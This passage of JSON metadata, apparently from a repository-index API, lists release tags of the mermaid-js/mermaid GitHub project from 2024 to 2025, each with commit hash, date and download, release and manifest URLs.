.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","pub